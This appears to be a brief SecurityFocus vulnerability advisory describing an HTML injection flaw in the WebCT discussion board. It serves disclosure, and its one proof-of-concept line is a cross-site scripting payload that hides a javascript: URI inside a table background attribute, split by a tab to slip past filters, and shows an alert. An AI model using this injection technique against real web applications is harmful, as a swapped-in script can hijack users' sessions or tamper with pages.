WebCT Discussion Board HTML Injection Vulnerability

No exploit is required.

The following proof of concept demonstrates a message field body suitable to exploit the vulnerability:

</pre><table background=java	script:alert("XSS Warning")>
</table>


 

Privacy Statement
Copyright 2010, SecurityFocus